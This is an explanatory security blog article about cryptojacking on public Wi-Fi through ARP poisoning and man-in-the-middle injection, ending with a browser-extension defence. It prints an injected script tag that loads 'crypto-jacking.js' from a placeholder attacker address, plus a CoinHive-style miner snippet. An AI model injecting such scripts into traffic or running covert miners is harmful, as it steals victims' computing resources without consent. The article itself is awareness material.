General security

Malicious Cryptominer in Wireless Networks

Pedro Tavares
March 23, 2018 by
Pedro Tavares

Introduction

The Cyber attacker is leveraging covert and malicious ways to produce digital money — often using Crypto miners. This clever technique is known specifically as "Crypto jacking."

It is the secret usage of computing processing power to mine cryptocurrency. This can lead to security breaches and can greatly impact the computer resources which are available. For instance, IT systems can freeze, personal data can be lost, and gaps can be created that other Cyber attackers can further exploit.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

In the past, Crypto jacking was used in drive-by malicious schemes. It occurred when the victim unknowingly installed a malware that secretly mined cryptocurrency. Now, in-browser Crypto jacking has formulated a new trend. For example, a piece of JavaScript code is injected into a webpage to mine digital cash. Because JavaScript runs on almost every website, the code responsible for in-browser mining does not need to be installed. As a result, there is no quick way to determine if a web page has a hidden mining component attached to it.

Crypto jacking via ARP Poisoning

This kind of Cyberattack is done by applying computer processing resources towards solving complex mathematical puzzles (known as the "Challenge"). The more processing power that is used, the more the Cyber attacker can access the cryptocurrency which is collected through mining. Unfortunately, public Wi-Fi networks are used in this mining process as well because they do not make use of any offline monitoring tools.

A perfect example of this is the Starbucks Coffee chain located in Buenos Aires, Argentina. In December 2017, the public Wi-Fi networks at these coffee shops were secretly using visitors' computers and smartphones to mine cryptocurrency.

Address Resolution Protocol (ARP) Poisoning attacks have been used to manipulate the users' traffic and make them mine cryptocurrency. This is done by adding a piece of malicious code in the web server requests. In this scenario, the Cyber attacker floods a target ARP cache with forged entries (this is also being also known as "Poisoning"). This technique makes use of Man-in-the-Middle attacks to poison the network.

How it Works

All requested web pages are infected with a snippet of code — this is the malicious Crypto miner. For this to happen, the Cyber attackers' computer is placed in the middle of the communication line, between the router and the users' computer. The figure below illustrates how this process works:

In the first stage, spoofed ARP messages are sent to the Wi-Fi network by the Cyber attacker, and as a result of this, the MAC address is identified as the default gateway. Also, all network traffic destined to the Wi-Fi router is now sent in advance to the Cyber attacker — who is also the Man-In-the-Middle.

The Positioned in a "sweet spot" on the network, the Cyber attacker can now actively intercept, analyze and change the public Wi-Fi traffic. The mitmproxy

tool

can

also

act as an active Man-In-the-Middle and inject a snippet of code in the web server requests. This line of code consists of a Javascript that calls the snippet code, and is illustrated below:

(source-code)

...

<script src="man-in-the-middle-IP/crypto-jacking.js"></script>

...

(source-code)

Example of a malicious cryptominer embedded in a Wi-Fi request.

The Cyber attacker can use a Crypto miner that runs on a local computer as well as other online APIs such as CoinHive and Crypto-Loot to mine the Cryptocurrency.

The Monero Cryptocurrency has gained a new role in Crypto jacking. It was officially launched in 2014, and it is designed to be used covertly on individual computers. For this to happen, the Monero mining tools have been recently put into circulation. They can be easily added to websites and fed through unsuspecting computers to execute the Cryptomining activities.

A snippet of code from CoinHive is illustrated below:

<script>

var miner = new CRLT.Anonymous('YOUR_SITE_PUBLIC_KEY');

miner.start();

</script>

Identifying and mitigating the risks of Crypto jacking is a very cumbersome and tedious task. Because public Wi-Fi networks are not being monitored in real time, they have become the prime venue for the Cyber attacker in which to trigger such events.

Conclusion

With Cybercrime on the rise, Crypto jacking has evolved into the latest threat landscape allowing hackers to obtain money in a very covert and easy way. As a result, it is difficult to fight against this kind of malicious activity.

To combat this threat, an end user can install various web-browser extensions that block in-browsing Cryptomining attacks. An example of this is No Coin, a Chrome extension developed by Rafael Keramidas. It blocks CoinHive mining and also adds an extra layer of protection against other forms of Crypto jacking.

References

https://hackernoon.com/crypto-jacking-whats-really-going-on-inside-your-computer-eca62d2bafcf

https://hackerbits.com/programming/what-is-cryptojacking/

https://seguranca-informatica.pt/crypto-jacking-via-arp-poisoning-attack-on-wifi-networks/#.WpfJdujFKUm

https://www.cyberscoop.com/salon-cryptomining-monero-ad-blocker-jordan-hoffner/

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

https://wccftech.com/love-using-free-wifi-starbucks-paying/

Pedro Tavares
Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and a Security Evangelist. He is also Editor-in-Chief of the security computer blog seguranca-informatica.pt.

In recent years, he has invested in the field of information security, exploring and analyzing a wide range of topics, such as malware, reverse engineering, pentesting (Kali Linux), hacking/red teaming, mobile, cryptography, IoT, and security in computer networks. He is also a Freelance Writer.